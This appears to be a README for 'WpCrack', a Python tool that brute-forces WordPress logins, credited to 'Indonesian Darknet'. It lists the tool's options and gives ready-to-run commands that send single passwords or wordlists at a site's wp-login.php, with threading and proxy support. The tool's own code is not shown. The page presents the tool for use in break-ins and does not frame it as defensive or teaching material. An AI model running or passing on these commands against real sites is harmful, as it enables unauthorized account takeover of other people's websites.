WordPress Brute Force Super Fast Login
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usage: python WpCrack.py [options]
optional arguments:
-h, --help show this help message and exit
-V, --version show program's version number and exit
-d, --debug debugging mode
target arguments:
-t , --target url of the target
-u , --username username of the target (default: admin)
-p , --password password of the target (change -p to --p to use a wordlist)
--timeout timed out for requests
--thread numbers of threading multiproccesor (default: 5)
--proxy using a HTTP proxy (ex: http://site.com:8000)
Copyright © 2021 Andrew - Powered by Indonesian Darknet
How To Use
Using a single password
python WpCrack.py -t http://site.com/wp-login.php -u admin -p password
Using a multiple password / wordlist
python WpCrack.py -t http://site.com/wp-login.php -u admin --p wordlist.txt
WpCrack is a tool used to force login into the WordPress CMS web application and is built in the Python programming language
- Very fast login
- Use of HTTP proxies
- Multithreading or Multiprocessor\
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